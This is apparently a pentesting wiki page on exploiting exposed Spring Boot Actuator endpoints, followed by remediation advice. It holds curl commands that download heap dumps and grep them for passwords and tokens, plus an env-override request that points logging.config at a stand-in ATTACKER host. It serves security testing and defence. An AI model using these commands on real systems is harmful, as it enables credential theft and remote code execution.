Skip to main content

Spring Boot Actuator

Spring Boot Actuator adds "production-ready" HTTP endpoints to a Spring Boot application for monitoring and managing it. They live under the base path /actuator by default. When they are exposed to untrusted networks (common misconfiguration: management.endpoints.web.exposure.include=*), they leak secrets, expose internals, and in some cases allow direct remote code execution or a full application shutdown.

info

An Actuator that exposes only /actuator/heapdump is still a complete compromise - the JVM heap holds database credentials, API keys and live session tokens.

Detecting Spring Boot​

  • X-Application-Context response header.
  • A "Whitelabel Error Page" on an unknown route, or JSON errors shaped {"timestamp","status","error","path"}.
  • Spring/Tomcat stack traces.
  • Cookie JSESSIONID.
  • Maven/Gradle build strings in errors.

Listing Exposed Endpoints​

Request the base path (no trailing slash) to read the _links map of what is enabled:

curl -s http://TARGET/actuator
# {"_links":{"self":{...},"heapdump":{"href":"http://TARGET/actuator/heapdump",...}}}

If /actuator is 404, brute the common endpoint names anyway.

Interesting Actuator Endpoints​

EndpointMethodWhy it matters
/actuator/heapdumpGETFull JVM heap → plaintext credentials, tokens, keys
/actuator/envGET/POSTAll environment variables + properties (secrets, masked values)
/actuator/configpropsGET@ConfigurationProperties beans (data sources, URLs)
/actuator/beansGETAll Spring beans, incl. DataSource/HikariDataSource
/actuator/mappingsGETEvery route the app exposes (hidden/internal endpoints)
/actuator/loggersGET/POSTRead/change log levels (set TRACE to leak data)
/actuator/logfileGETTail the application log file
/actuator/httptrace (or /httpexchanges)GETRecent HTTP requests - may include Authorization headers
/actuator/threaddumpGETThread stacks - in-flight request data
/actuator/sessionsGETSession IDs → session hijack
/actuator/shutdownPOSTShuts the app down (availability impact)
/actuator/jolokiaGET/POSTJolokia JMX bridge → MBean invocation
/actuator/gateway/*-Spring Cloud Gateway routes (CVE-2022-22947 SpEL RCE)

Retrieving Secrets from /actuator/heapdump​

The heap dump is a raw JVM memory image. Grab it and mine it for secrets:

curl -s http://TARGET/actuator/heapdump -o heap.hprof   # can be 100 MB+
file heap.hprof # "Java HPROF dump"
strings -n 6 heap.hprof > heap.txt

Hunt for credentials and infrastructure:

# JDBC URLs and datasource config
grep -aoE 'jdbc:[a-zA-Z0-9:./?=&_%-]+' heap.txt | sort -u
# Passwords, tokens, keys, brokers
grep -aiE 'password|secret|apikey|token|datasource|hikari|bootstrap-servers' heap.txt | sort -u
# Spring config keys
grep -aoE '(spring\.|server\.|management\.)[a-zA-Z0-9._-]+' heap.txt | sort -u

The heap also retains the app's own config classes with their constant values next to the property names. Locate the class, then dump that region:

grep -abo 'com.example.config.DataSourceConfig' heap.hprof     # -> offset
dd if=heap.hprof bs=1 skip=$((offset-300)) count=900 | strings -n 3

That reliably prints hardcoded usernames, passwords, JDBC URLs and env-var names (DB_USERNAME, DB_PASSWORD, DB_JDBC_URL).

/actuator/env and Property Override (older Spring Boot)​

/actuator/env lists property sources; values are masked only if the property name is in management.endpoints.env.keys-to-sanitize. Use /actuator/env/<propertyName> for the raw value. On Spring Boot < 2.6.5, POST /actuator/env can set a property at runtime - historically chained into logback/JNDI and config-poisoning attacks:

curl -s -X POST http://TARGET/actuator/env \
-H 'Content-Type: application/json' \
-d '{"name":"logging.config","value":"http://ATTACKER/logback.xml"}'

Jolokia​

If /actuator/jolokia is present, it bridges to JMX. Enumerate MBeans, then invoke operations - a classic RCE primitive when combined with a logging or JNDI MBean:

curl -s http://TARGET/actuator/jolokia/list
curl -s http://TARGET/actuator/jolokia/exec/<mbean>/<operation>

Spring Cloud Gateway Actuator (CVE-2022-22947)​

If /actuator/gateway is exposed, routes can be added that contain a SpEL expression → unauthenticated RCE. This is a very high-value find; check the Spring Cloud Gateway version.


Remediation / Secure Coding​

Do not expose Actuator endpoints to untrusted networks. This is the primary fix.

  1. Minimal exposure - only enable what is needed, never *:
    management.endpoints.web.exposure.include=health,info
    management.endpoints.web.exposure.exclude=heapdump,env,beans,configprops,threaddump,httptrace,shutdown,jolokia
  2. Separate management port bound to localhost / an internal interface, hidden behind the firewall:
    management.server.port=9090
    management.server.address=127.0.0.1
  3. Secure it with Spring Security - require an admin role for /actuator/**; never ship Actuator unauthenticated in production.
  4. Disable dangerous endpoints by default (shutdown, heapdump, env, jolokia) and sanitise env keys.
  5. Never hardcode secrets in the app or config - use a secret manager / injected env vars. This blunts heapdump impact.
  6. Keep Spring Boot patched - CVE-2022-22947 (Gateway Actuator RCE) and the env-override issues are fixed in current versions.
  7. Monitor/alert on access to /actuator/**; a single hit to /actuator/heapdump is a strong intrusion signal.

References​